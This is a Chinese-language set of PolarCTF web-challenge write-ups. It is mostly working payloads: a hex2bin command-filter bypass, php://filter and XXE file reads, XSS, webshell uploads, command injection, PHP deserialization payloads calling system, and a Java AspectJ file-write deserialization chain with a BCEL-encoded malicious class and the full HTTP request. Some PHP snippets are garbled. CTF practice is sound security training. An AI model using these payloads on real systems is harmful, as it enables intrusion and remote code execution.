PolarCTF WEB 题解（04）

ezJson

500 分 5 Polar币

【2024夏季个人挑战赛】

放一放先

CC链

500 分 5 Polar币

【2024夏季个人挑战赛】

放一放先

FastJsonBCEL

500 分 5 Polar币

【2024夏季个人挑战赛】

放一放先

ezJson

500 分 5 Polar币

【2024夏季个人挑战赛】

fastJson反序列化

放i放先。

Dragon

300 分 3 Polar币

flag在cookies里

tnl

300 分 3 Polar币

【2024夏季个人挑战赛】

twothree=php://filter/convert.base64-encode/resource=index

twothree=php://filter/convert.base64-encode/index/resource=flag

你知道sys还能这样玩吗

300 分 3 Polar币

【2024夏季个人挑战赛】

/sys.php

过滤如何绕过：

$cmd = $_POST['cmd'];
    if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget/i', $cmd)) {
        $output = system($cmd);
        echo $output;
    }

引号和圆括号没有过滤：

└─# echo "ls"|hex                                   
6c730a

cmd=php -r 'system(hex2bin("6c73"));'

└─# echo "cat /flag.txt"|hex
636174202f666c61672e7478740a
cmd=php -r 'system(hex2bin("636174202f666c61672e7478740a"));'

扫扫看

100 分 1 Polar币

【2024夏季个人挑战赛】

dirsearch -u url

/flag.php

查看输出

debudao

100 分 1 Polar币

【2024夏季个人挑战赛】

<script>alert("aa")</script>
<script>alert(document.cookie)</script>

审计

100 分 1 Polar币

【2024夏季个人挑战赛】

https://blog.csdn.net/2301_81684021/article/details/144907940

//数字
240610708 0e462097431906509019562988736854 
314282422 0e990995504821699494520356953734 
571579406 0e972379832854295224118025748221 
903251147 0e174510503823932942361353209384 
1110242161 0e435874558488625891324861198103 
1320830526 0e912095958985483346995414060832 
1586264293 0e622743671155995737639662718498 
2302756269 0e250566888497473798724426794462 
2427435592 0e067696952328669732475498472343 
2653531602 0e877487522341544758028810610885 
3293867441 0e471001201303602543921144570260 
3295421201 0e703870333002232681239618856220 
3465814713 0e258631645650999664521705537122 
3524854780 0e507419062489887827087815735195 
3908336290 0e807624498959190415881248245271 
4011627063 0e485805687034439905938362701775 
4775635065 0e998212089946640967599450361168 
4790555361 0e643442214660994430134492464512 
5432453531 0e512318699085881630861890526097 
5579679820 0e877622011730221803461740184915 
5585393579 0e664357355382305805992765337023 
6376552501 0e165886706997482187870215578015 
7124129977 0e500007361044747804682122060876 
7197546197 0e915188576072469101457315675502 
7656486157 0e451569119711843337267091732412

找其他开头的：

<?php
function findMD5Collision( $prefix) { // 循环尝试不同的字符串 for ($ i = 0;  $ii++) { // 生成一个候选字符串 candidate =prefix . i; // 计算 MD5 哈希值md5 = md5(candidate); // 检查哈希值是否符合要求 if (preg_match("/^0e[0-9]{30}/", md5)) { echocandidate; return candidate; // 返回符合条件的字符串 } } return false; // 如果没有找到，则返回 false }prefix = "ailx10"; // 我们希望字符串以 "ailx10" 为前缀 string = findMD5Collision(prefix); if (string !== false) { echo "找到的字符串: " .string . "\n"; echo "MD5 哈希值: " . md5($string) . "\n"; } else { echo "未找到符合条件的字符串。\n"; } ?>$

ExX?

300 分 3 Polar币

【2024夏季个人挑战赛】

2.8.0 dom

dirsearch -u url

dom.php

/dom.php

POST:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe[
  <!ELEMENT name ANY>
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php"
>]>
<name>&xxe;</name>

---or----

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/flagggg.php" >]>
    <user>

<name>&xxe;</name>

</user>

upload1

100 分 1 Polar币

【2024夏季个人挑战赛】

前端验证扩展名，POST直接提交php木马

pass=system(“cat /flag.txt”);

rapyiquan

100 分 1 Polar币

【2024秋季个人挑战赛】

?c[md=l\s /
?c[md=c\at /fl\ag.php

bllbl_ser1

100 分 1 Polar币

【2024秋季个人挑战赛】

<?php
class bllbl{
    public  $qiang;//我的强 } class bllnbnl{ public$ er='system("ls /");';
}

 $a = new bllbl();$ b = new bllnbnl();
 $a->qiang =$ b;
// $b->er='system("ls /");'; //这里赋值一样的 //注意);后有分号，否则报错。$ payload = serialize( $a); echo "URL编码后的Payload:\n"; echo urlencode($ payload) . "\n\n";

echo "原始Payload:\n";
echo $payload;
?>

output:

URL编码后的Payload:
O%3A5%3A%22bllbl%22%3A1%3A%7Bs%3A5%3A%22qiang%22%3BO%3A7%3A%22bllnbnl%22%3A1%3A%7Bs%3A2%3A%22er%22%3Bs%3A15%3A%22system%28%22ls+%2F%22%29%3B%22%3B%7D%7D

原始Payload:
O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:15:"system("ls /");";}}

?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:15:"system("ls /");";}}
?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:20:"system("cat /flag");";}}

EZ_Host

300 分 3 Polar币

【2024秋季个人挑战赛】

dirsearch -u url

/flag

?host=127.0.0.1;ls

?host=127.0.0.1;cat flag

传马

300 分 3 Polar币

【2024秋季个人挑战赛】

前端验证php不能传，后端传时更改扩展名木马

pass=system(“cat /flag.txt”);

笑傲上传

300 分 3 Polar币

【2024秋季个人挑战赛】

上传一个jpg非木马，然后看到输出里有include.php

/include.php?file=php://filter/convert-base64.encode/resource=/flag.txt

Deserialize

500 分 5 Polar币

【2024秋季个人挑战赛】

/hidden/

/hidden/hidden.php

<?php
class Token {
    public  $id; public$ secret;

    public function __construct( $id,$ secret) {
         $this->id =$ id;
         $this->secret =$ secret;
    }

    public function generateToken() {
        return "Token for { $this->id}"; } } class User { public$ name;
    public  $isAdmin = false; public$ token;

    public function __construct( $name,$ isAdmin, Token  $token) {$ this->name =  $name;$ this->isAdmin =  $isAdmin;$ this->token =  $token; } public function getInfo() { return "{$ this->name} is " . ( $this->isAdmin ? "an admin" : "not an admin"); } } class Product { public$ productName;
    public  $price; public function __construct($ productName,  $price) {$ this->productName =  $productName;$ this->price =  $price; } public function displayProduct() { return "Product: {$ this->productName}, Price: { $this->price}"; } }$ product=new Product("apple",1000);
 $token=new Token(1,"secret");$ token->product= $product;$ user=new User("ZHSH",true, $token);$ payload = serialize( $user); echo "URL编码后的Payload:\n"; echo urlencode($ payload) . "\n\n";

echo "原始Payload:\n";
echo $payload;
?>

URL编码后的Payload:
O%3A4%3A%22User%22%3A3%3A%7Bs%3A4%3A%22name%22%3Bs%3A4%3A%22ZHSH%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3Bs%3A5%3A%22token%22%3BO%3A5%3A%22Token%22%3A3%3A%7Bs%3A2%3A%22id%22%3Bi%3A1%3Bs%3A6%3A%22secret%22%3Bs%3A6%3A%22secret%22%3Bs%3A7%3A%22product%22%3BO%3A7%3A%22Product%22%3A2%3A%7Bs%3A11%3A%22productName%22%3Bs%3A5%3A%22apple%22%3Bs%3A5%3A%22price%22%3Bi%3A1000%3B%7D%7D%7D

原始Payload:
O:4:"User":3:{s:4:"name";s:4:"ZHSH";s:7:"isAdmin";b:1;s:5:"token";O:5:"Token":3:{s:2:"id";i:1;s:6:"secret";s:6:"secret";s:7:"product";O:7:"Product":2:{s:11:"productName";s:5:"apple";s:5:"price";i:1000;}}}

序列一下

300 分 3 Polar币

【2024秋季个人挑战赛】

https://www.jyshare.com/compile/1/

<?php
class Polar{
    public  $lt = "system"; public$ b = "ls /";
}
 $a=new Polar();$ payload = serialize( $a); echo "URL编码后的Payload:\n"; echo urlencode($ payload) . "\n\n";

echo "原始Payload:\n";
echo $payload;
?>

output:

URL编码后的Payload:
O%3A5%3A%22Polar%22%3A2%3A%7Bs%3A2%3A%22lt%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22b%22%3Bs%3A4%3A%22ls+%2F%22%3B%7D

原始Payload:
O:5:"Polar":2:{s:2:"lt";s:6:"system";s:1:"b";s:4:"ls /";}

1ncIud3

100 分 1 Polar币

【2024秋季个人挑战赛】

f14g fla9 f1ag fl4g fl49 f149

/?page=…/./…/./f1a9

SnakeYaml

500 分 5 Polar币

【2024秋季个人挑战赛】打c3p0二次反序列化回显

fangyifang

一写一个不吱声

500 分 5 Polar币

【2024秋季个人挑战赛】 clesses，你也许需要知道$JAVA_HOME? Java反序列化漏洞+特殊情况下的springboot任意文件写rce

首页源代码中有一个base64编码串，解码后为：

小T在学习JAVA的时候遇到了一个问题：SpringBoot的任意文件写如何才能RCE？
我在服务器某个地方创建了一个文！件！夹！，然后在服务器上部署了这个JAVA项目，小T说这个JAVA项目虽然有反序列化漏洞但是你没链子你怎么打，我不信你能RCE。

那么现在请你来试试，怎么才能RCE让小T不吱声呢？

下载jar

package BOOT-INF.classes.com.polar.ctf.controller;

import com.polar.ctf.bean.UserBean;
import com.polar.ctf.util.Tools;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;

@Controller
public class ReadController {
  @PostMapping({"/read"})
  public UserBean getUserObj(String obj) throws Exception {
    byte[] Bytes = Tools.base64Decode(obj);
    return (UserBean)Tools.deserialize(Bytes);
  }
}

UserBean

  private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ObjectInputStream.GetField gf = ois.readFields();
    HashMap<String, byte[]> a = (HashMap<String, byte[]>)gf.get("obj", (Object)null);
    String name = (String)gf.get("name", (Object)null);
    String age = (String)gf.get("age", (Object)null);
    if (a == null) {
      this.obj = null;
    } else {
      try {
        a.put(name, Tools.base64Decode(age));
      } catch (Exception var7) {
        var7.printStackTrace();
      } 
    } 
  }

存在反序列化利用

pom.xml

<properties>
        <!-- JRE FROM openjdk:8u102-jre       -->
        <!-- JRE FROM openjdk:8u102-jre       -->
        <!-- JRE FROM openjdk:8u102-jre       -->

知道JDK版本，可以得到docker中的jdk路径，JAVA_HOME/clesses 用户建立的路径就知道了。

EvilEco.java

//com.sun.org.apache.bcel.internal.util.ClassLoader
// 是 Apache BCEL（Byte Code Engineering Library）的一部分，但需要注意以下几点：
//   JDK 版本限制‌：该 ClassLoader 在 JDK 8u252 及更高版本中已被移除
//    。如果你的 JDK 版本较新，可能无法直接使用。
//  example :  jdk1.8.0_201
//

/*

rO0ABXNyAAhFdmlsRWNob2turzAL9eh9AgAAeHA=
obj=rO0ABXNyAAhFdmlsRWNob2turzAL9eh9AgAAeHA%3D

 */

import com.sun.org.apache.bcel.internal.util.ClassLoader;

import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import java.util.Base64;

public class EvilEcho implements Serializable {
    public static void main(String[] args) {
        ClassLoader cl = new com.sun.org.apache.bcel.internal.util.ClassLoader();
        try {
            Class<?> evilClass = Class.forName("EvilEcho");
            Object evilInstance = evilClass.getDeclaredConstructor().newInstance();
            ByteArrayOutputStream btout = new ByteArrayOutputStream();
            ObjectOutputStream objOut = new ObjectOutputStream(btout);
            objOut.writeObject(evilInstance);
            System.out.println(new String(Base64.getEncoder().encode(btout.toByteArray())));
            //deserialize(btout.toByteArray());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    private void readObject(ObjectInputStream ois) throws Exception {
        String code = " $BCEL$ $l$8b$I$A$A$A$A$A$A$A$8dV$5bW$TW$U$fe$8e$q$99a$YD$C$I$f1R$c1k$40M$c4$bb$40$ad$IX$ac$B$adA$v$a2m$87$e1$A$D$93$9983$B$b4$f7$7bko$f6fk$ed$cd$da$d6v$f5$c9$97$e8j$97$ae$3e$f7$a1$7d$e9k$9f$fa$d4$be$f4$l$d4$ee$93I4$R$ace$z$f69g_$ce$de$fb$db$7b$9f$cc$cf$ff$fcp$D$c0V$7c$a7$a0$i$87$U$3c$8c$c3$82$qe$M$u8$82$a32$G$r$3c$a2$40$c2$90$84c$K$86q$5c$c6$J$Z$8f$caxL$c6$e324$n$h$91$a1$cb$Y$95$c0$85$c6$98$8cq$Z$T$K$ML$w$a8$c1$94$MS$ac$v$Z$96$M$5bFZ8$3b$v$c3$91$e0$w$f0$90$RdZ$c1$Mf$V4$e2$94$8c$d3b$7dB$90$te$3c$r$e3i$J$cf$uh$c1$b3$S$9ec$Iu$Y$96$e1$edf$u$8b6$le$It$d9$a3$9c$a1$waX$bc$3f$93$g$e1$ce$806b$S$t$9c$b0u$cd$3c$aa9$868$e7$99$Bo$c2p$ZV$tlg$3c$ceg$b5T$da$e4q$cdMs$dd$9b$9c$e1$da4w$e2$7b$bbz$S$3d$fa$84$dd$ce$mw$e8f$de$d9$82$e9M$M$d5$89ImZ$8b$9b$9a5$k$ef25$d7m$X$82V$86$rE$C$87$8f$99t$5d$bc$8f$7b$T$f6hNc$b3$88$e6$b6$c6$c1$91IR$c8I$b6$I$b2U$90m$82l$Xd$87$m$3b$F$d9Uj$97$f4$i$c3$g$t$bb$b2$e9V$8a$a6fx$3eYpZsZ$v$a4$ba$oa$cf$ac$ce$d3$9ea$5b$q$afLz$9a$3e$d5$a7$a5s$88Py$r$3cO$c5$a5$eaI$e8$s$a0$Z$94$a4$9dqt$be$cf$Q$80U$W$e0$88$89$ebTlDL$c2$L$w$5e$c4K$w$5e$c6$x$M$j$Ee$ccM$L$f7c$8e$96$e23$b63$V$9b$e1$p1$dd$b6$3c$3e$eb$c5$i$7e2$c3$5d$_v$d8_$bb$7cv$afm$8er$ea$81WU$bc$863$M$b5$e3$dc$cbktz$94$ccH$c6$e3T$a9$aa$3b$QW$f1$3a$de$60Xt$t$9a$94$85$8a7$f1$W$c3$9e$ff$hO$92$3b$d3$e6$bcN$xr$b1$b8i$dbr$J$C$e5vd$M$cb$85$e3$d9$98$eb$db$de$be$a3$a0$5cN$ca$83$8e$e1qG$c5$db$o$d25$a5$G$T$9e$97$8e$f5$S$v$f5$ee$h$f6r$8d0$v$c9$ce$af$ab$8a$b3x$87$ea$ae$a7F$Z$q$db$8dY$94$98$84wU$bc$87$f7U$7c$80s$q$i$dc$df$af$e2C$7cD$9d$T$d7I$z$3ebXqw$82$8e$hu$V$e7$f11$f1$E$y$9eiQ$x$e7$5cd$3c$c3$8c$tu$cd$b2D$v$$$a8$f8$E$9f$aa$f8$M$9fK$f8B$c5E$7c$v$K$7e$89n8$de$a9$e2$x$7c$ad$e2$h$e1$w8ff$c4$c5A$dd$b4$zJ$baf$9eVSq$Z$df2$ac$bc$f7$a014$dcmzJ$a0$Y$98p$I$ljI$3d$e38$dc$f2$K$e7$dahs$e2N$zj$f4$3a$C4$dfk$b9$ceI$d8$3e$b8$91$S$f5$o$91$b0$99W$40$c51i$93$e3PA$a3s$c7n$ce$8d$ed$7eA$LY$ec$99$c7fx$8eM$f3$7f$bd$o$n$c3$9a$b6$a7$I$ec$5d$d1$b9O$c9$f0$5cV$f3$7c$PN5$c5$d4$cduSs$f8h$n$b6J$97$7b$9d$ba$ce$5d$d7$f0$9f$c8$e81$f1$ae$W$f7$e0$v$d7$e3$v$7f$y$O9v$9a$3b$de$v$86$b5$f7$c0$e1$d6$8bT$e1$d9G$d2d$d4$a5$89$B$v$ad$d6$z$rYL$a7fX$E$f0$d2$e2$8b$bb$s4$t$vf$c4$d2y$7b$f31R$Ue$f5$xQ3$b7$92$ed$85$ce$ce$b1$Og$y$cfH$VF$b8p$a8$x1$cb$b3$c90$c0g9$cdM4$3a$cf$bbZlA$Q$I$b4J$5d$e5$99$M$L$c9$d5$7e$x$9d$f1$c8$92k$84Z$7d$c1$9da$c7$8b$Ed$de$Q$9dW$m$d0W3$$$ef$e6$a6$91$S$_$J$c3$ba$bbc$5d$3c$c2$o$J$8b$fa$9d$8aJQ$e4$k$fa$BG$d3$v$e7$c6hsiV$FQ$8f$c9S4K$edh$c2$G$fa$5d$W$7f$L$c0$c43O4N$a78$ad$8c$d6$60$cbU$b0$x9$f1$s$a2$a1$i3$84V$a2$aa$af$80$cd$d8B$abL$l$Uy$e3$F$df$d3$95$V$A$d3$afaA$We$e1$40$W$c1$D$z$e1P$d9uHY$c8$89$f5$8cv$e5Y$u$7dy$85$K_A$z$u$b4$84$x$f3$db$fe$f5$h$f2$bam$81$8d$b7$b6$c1$bc$ddB$b2$LW$f9$aa$8b$daByn$b5$e0$86$D$c4$j$w$L$d7$q$85H$8aH$UDm$q$e4$d3H$a0p$93$i$91$oAR$z$t$d5$3aRU$7eBM$5by$e8$3aQ$r$bc$f8$g$ea$b3h$IG$b2Xr$k$e1$88$ot$oJ$m$bc4y$ZU$e2$b8$yw$5cN4$Y$vOF$e4$y$ee$L$af$u$f6$i$91$fd$cb$7fD$e3$d054E$94$yVf$b1$ea$wV$87$d7d$b16$8bu$c2$e9$a0o$Z$cdg$S$91$f3$e1$e5$f9$cds$f8$97Q$7e$a0$r$8b$f5$83WD$R$d8$Q$3bN$lJe$b9$S9XF$b4$9c$ca$a3$a0$9e$ca$d0$E$f1$9aWb$t$W$a2$LU$e8$c7$o$M$a1$g6$c28C_hgQ$8bs$a8$c3$r$y$G$e5$8b$hh$c0$_$88$e07$y$c1$eft$d7$lX$8e$3f$b1$C$7f$a3$915$a3$89ub$r$h$c2$g$f2$b8$8a$9d$c0j6$82$b5$b9v8M$7eT$d6$87m$d8N$a7z$b6$X$3b$c8$t$p$8b$9d$d8$856j$a0$$$b6$Y$ed$c4$xC$3f$ab$40$H$f1$C$Y$a2$f0$ef$a7$5d$90$e2$f9$L$bbI$g$a2$a8$7e$c5$D$b4$93$u$a6$y$f6$90T$a6$c8$$$a2$T$7b$v$af$h$b8$40ytC$n$efA$f4$60$ly$7b$90$fe$b7$pp$93$C$ae$90$d0$xa$bf$84$87$K$d4$df$f8$fb$D$S$S$40$c5MB$89$60$93$d0$X$a4$I$fbs$ed$7d$f0_g$f9j$k$Y$L$A$A";
        //new ClassLoader().loadClass(code).newInstance();
        ClassLoader classLoader = (ClassLoader) Class.forName("com.sun.org.apache.bcel.internal.util.ClassLoader").getDeclaredConstructor().newInstance();

        // 获取 loadClass 方法
        Method loadClassMethod = classLoader.getClass().getMethod("loadClass", String.class);

        // 调用 loadClass 方法加载类
        Class<?> loadedClass = (Class<?>) loadClassMethod.invoke(classLoader, code);
        loadedClass.newInstance();
    }
}

Poc.java

package ysoserial.AspetJW;


import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;

import static com.polar.ctf.util.Tools.base64Encode;
import static com.polar.ctf.util.Tools.serialize;

public class Poc {
    public static void main(String[] args) throws Exception {
        Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class, int.class);
        con.setAccessible(true);
        // 实例化对象
        HashMap map = (HashMap) con.newInstance("/usr/lib/jvm/java-8-openjdk-amd64/jre/classes/", 1);     //路径
        Constructor constructor = Class.forName("com.polar.ctf.bean.UserBean").getDeclaredConstructor();
        constructor.setAccessible(true);
        Object userBean = constructor.newInstance();
        Class cls = userBean.getClass();
        Field field = cls.getDeclaredField("obj");
        field.setAccessible(true);
        field.set(userBean, map);
        Field field1 = cls.getDeclaredField("name");
        field1.setAccessible(true);
        field1.set(userBean, "EvilEcho.class"); //恶意类文件名，注意和下方内容的类名一致。
        Field field2 = cls.getDeclaredField("age");
        field2.setAccessible(true);
        String payload = "yv66vgAAADQAdAoABgAtCAxxxxxx"; // 恶意类Base64编码后的内容
        try{
            byte[] bytes = Files.readAllBytes(Paths.get("D:\\ctf\\workspace\\javaprj\\ysoserial\\target\\classes\\EvilEcho.class"));
            payload = Base64.getEncoder().encodeToString(bytes);
        }catch (IOException e){
            e.printStackTrace();
        }
        field2.set(userBean, payload);
        byte[] bytes = serialize(userBean);
        System.out.println(base64Encode(bytes));
    }
}

payload write

/read

POST /read HTTP/1.1
Host: 3343ac18-60e3-4ca5-9980-6d772062605f.www.polarctf.com:8090
Content-Length: 11370
Pragma: no-cache
Cache-Control: no-cache
Origin: http://3343ac18-60e3-4ca5-9980-6d772062605f.www.polarctf.com:8090
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://3343ac18-60e3-4ca5-9980-6d772062605f.www.polarctf.com:8090/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

obj=rO0ABXNyABtjb20ucG9sYXIuY3RmLmJlYW4uVXNlckJlYW7R%2BjMfv6DhngIAA0wAA2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABG5hbWVxAH4AAUwAA29ianQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdB%2FAeXY2NnZnQUFBRFFBa2dvQUNBQkxCd0JNQ2dBQ0FFc0lBRTBLQUFZQVRnY0FUd29BQmdCUUJ3QlJDZ0JTQUZNSEFGUUtBQW9BU3djQVZRb0FEQUJXQ2dBTUFGY0pBRmdBV1FjQVdnb0FXd0JjQ2dBS0FGMEtBRjRBWHdvQUVBQmdDZ0JoQUdJSEFHTUtBQllBWkFnQVpRZ0FaZ29BQ0FCbkNBQm9DZ0FHQUdrS0FHb0Fhd29BQmdCc0J3Qk5Cd0J0QVFBR1BHbHVhWFErQVFBREtDbFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFFa3h2WTJGc1ZtRnlhV0ZpYkdWVVlXSnNaUUVBQkhSb2FYTUJBQXBNUlhacGJFVmphRzg3QVFBRWJXRnBiZ0VBRmloYlRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWUJBQWxsZG1sc1EyeGhjM01CQUJGTWFtRjJZUzlzWVc1bkwwTnNZWE56T3dFQURHVjJhV3hKYm5OMFlXNWpaUUVBRWt4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJXSjBiM1YwQVFBZlRHcGhkbUV2YVc4dlFubDBaVUZ5Y21GNVQzVjBjSFYwVTNSeVpXRnRPd0VBQm05aWFrOTFkQUVBSEV4cVlYWmhMMmx2TDA5aWFtVmpkRTkxZEhCMWRGTjBjbVZoYlRzQkFBRmxBUUFWVEdwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0N0FRQUVZWEpuY3dFQUUxdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c0JBQUpqYkFFQU0weGpiMjB2YzNWdUwyOXlaeTloY0dGamFHVXZZbU5sYkM5cGJuUmxjbTVoYkM5MWRHbHNMME5zWVhOelRHOWhaR1Z5T3dFQUZreHZZMkZzVm1GeWFXRmliR1ZVZVhCbFZHRmliR1VCQUJSTWFtRjJZUzlzWVc1bkwwTnNZWE56UENvK093RUFEVk4wWVdOclRXRndWR0ZpYkdVSEFEVUhBRXdIQUdNQkFBcHlaV0ZrVDJKcVpXTjBBUUFlS0V4cVlYWmhMMmx2TDA5aWFtVmpkRWx1Y0hWMFUzUnlaV0Z0T3lsV0FRQURiMmx6QVFBYlRHcGhkbUV2YVc4dlQySnFaV04wU1c1d2RYUlRkSEpsWVcwN0FRQUVZMjlrWlFFQUVreHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFDMk5zWVhOelRHOWhaR1Z5QVFBUGJHOWhaRU5zWVhOelRXVjBhRzlrQVFBYVRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkRzQkFBdHNiMkZrWldSRGJHRnpjd0VBQ2tWNFkyVndkR2x2Ym5NQkFBcFRiM1Z5WTJWR2FXeGxBUUFOUlhacGJFVmphRzh1YW1GMllRd0FJUUFpQVFBeFkyOXRMM04xYmk5dmNtY3ZZWEJoWTJobEwySmpaV3d2YVc1MFpYSnVZV3d2ZFhScGJDOURiR0Z6YzB4dllXUmxjZ0VBQ0VWMmFXeEZZMmh2REFCdUFHOEJBQTlxWVhaaEwyeGhibWN2UTJ4aGMzTU1BSEFBY1FFQUVHcGhkbUV2YkdGdVp5OVBZbXBsWTNRSEFISU1BSE1BZEFFQUhXcGhkbUV2YVc4dlFubDBaVUZ5Y21GNVQzVjBjSFYwVTNSeVpXRnRBUUFhYW1GMllTOXBieTlQWW1wbFkzUlBkWFJ3ZFhSVGRISmxZVzBNQUNFQWRRd0FkZ0IzQndCNERBQjVBSG9CQUJCcVlYWmhMMnhoYm1jdlUzUnlhVzVuQndCN0RBQjhBSDhNQUlBQWdRY0FnZ3dBZ3dDRURBQWhBSVVIQUlZTUFJY0FpQUVBRTJwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0TUFJa0FJZ0VOZnlRa1FrTkZUQ1FrSkd3a09HSWtTU1JCSkVFa1FTUkJKRUVrUVNSQkpEaGtWaVExWWxja1ZGY2tWU1JtWlNRNFpTUnhKRGs1WVNSWlJDUkRKRWtrWmpGU0pHTXhheVEwTUUwa1l6UWtZbUlrTkRBa1lXUWtTVmdrWVdNa1FpUmhaRUVrZGlSaE1tMGtPRGNrWlRFa1FTUkVKRGt6SkRrNU9ETWtRaVJpTkNSbU55UTNZbXR2SkdZMlptc2taV1FrWTJRa1pHRWtaRFoySkdZMUpHTTVKRGszSkdVNGFpUTVOeVJoWlNRelpTUm1OeVJoTVNRM1pDUmxPV3NrT1dZa1ptRWtaRFFrWW1Va1pqUWtiQ1JrTkNSbFpTUTVNMGswSkZJa1lXTmxKSG9rWmpZNVoxOGtZMlVrWkdVa1ptSWtaR0lrTjJJa09XWWtZMk1rWTJZa1ptWWtabU53SkVRa1l6QldKRGRqSkdFM0pHRXdKR2trT0Rja1ZTUXpZeVE0WXlSak15UTRNaVJ4WlNSTkpIVTRKRGd5SkdFek1pUkhKSElrTTJNa1lUSWtOREFrWXpJa09UQWtPRFJqSkVza09EWnhKRFZqSkdNMkpFb2tXaVE0WmlSallYaE1KR00ySkdVek1qUWtiaVJvSkRreEpHRXhKR05pSkZra09UVWtZekFrT0RVa1l6WWtPVGdrT0dOeEpGb2tWQ1JMSkUxTUpIY2tZVGdrWXpFa09UUWtUVk1rWVdNa2RpUmFKRGsySkUwa05XSkdXamdrTTJJa2RpUmpNeVE1TVNSbE1DUjNKR1l3SkRrd0pGSmtXaVJqTVNSTlppUldOQ1JsTWlRNU5DUTRZeVJrTTJJa04yUkNKRGt3SkhSbEpETmpKSElrWlROcEpFb2tZMllrZFdna1l6RWtZak1rVXlRNVpXTWtTWFVrV1NRNU5pUmxNU1JsWkdZa2RTUTRZallrYkdVa1NYUWtaRGtrWVRNa09XTWtZVEVrZDJGWUpHSmpKRE5tSkRrekpHY2taVEVrWTJVa09EQTJZaVJUSkhRa09XTWtZakIxSkdOa0pETmpKR0ZoT1NRNE5qZ2taVGNrT1Rra1FtOGtZekp3SkZwV0pIUnNaeVF6WXlSalpXY2tZalZVSkdSaEpHVTBjU1JqWkUxekpHUmtKRGxpSkRsakpHVXhKR1JoTkhja1pUSWtOMklrWW1KNkpGTWtNMlFrWm1Fa09EUWtaR1FrWTJVa2JYY2taVGhtSkdSbEpHUTVKRGd5SkdVNVRTUk5KR1ExSkRnNVNXMWFKRGhpSkRsaUpEbGhOU1JySkdWbU1qVWtaRGR0SkZna09ESldKRGcySkhKRkpFTWtPRGNrT0dZa09UbDBKRFZrSkdKakpEaG1KRGRpSkZRa1pqWm9UbU1rWWpNa09EZ2taVFlrWWpZa1l6WWtZekVrT1RGSlVpUmpPRWtrWWpZa1NTUmlNbFVrT1RCdEpEZ3liQ1JZWkNRNE55UnRKRE5pSkVZa1pEbFZhaVE1TnlSbU5DUnBKR016Skdja2RDUmlZaVJpTWlSbE9WWWtPR0VrWVRabWVDUXpaVmx3V25OYUpIWWtZVFFrWW1Fa2IyRWtZMllrWVdNa1kyVWtaRE1rT1dWaEpEVmlKSEVrWVdaTWVpUTVZU1F6WlNSa05TUmhOeVJoTlhNa09EaFFlU1J5SkROalR5UmpOU1JoTlNSbFlVa2taVGdrY3lSaE1DUmFKRGswSkdFMEpEbGtjWFFrWW1Va1kyWWtVU1E0TUZVa1Z5UmxNQ1E0T0NRNE9TUmxZbFJzUkV3a1l6SWtUQ1IzSkRWbEpHTTBTeVIzSkRWbEpHTTJKSGdrVFNScUpFVmxKR05qVFNSTUpHWTNZeVE0WlNRNU5pUmxNak1rWWpZekpGWWtPV0lrWlRFa2NERWtaR1FrWWpZa00yTWtNMlVrWldJa1l6VWthU1EzWlRJa1l6TWtOV1FrWDNZa1pEaGZKR0ppSkRkamRpUmhabTBrT0dWeUpHVmhKRGd4VjFVa1ltTWtPRFl6SkUwa1lqVWtaVE1rWkdNa1kySnJkSG9rT1RRa1kyTklKR00ySkdVelZDUmhPU1JoWVNRellpUlJWeVJtTVNRellTUmtaU1EyTUZoMEpIUWtPV0VrT1RRa09EVWtPR0UzSkdZeEpGY2tZek1rT1dVa1ptWWthRThrT1RJa00ySWtaRE1rWlRZa1ltTk9KSGh5SkdJeEpHSTRhU1JrWW5Ja1NpUkRKR1UxZG1Ra1RTUmpZaVE0TlNSbE15UmtPU1E1T0NSbFlpUmtZaVJrWlNSaVpTUmhNeVJoTUNRMVkwNGtZMkVrT0RNa09HVWtaVEZ4UnlSak5TUmtZaVJ2SkdReU5TUmhOU1JISkZRa09XVWtPVGNrT0dVa1pqVWtVeVIySkdZMUpHVmxKR2drWmpaeUpE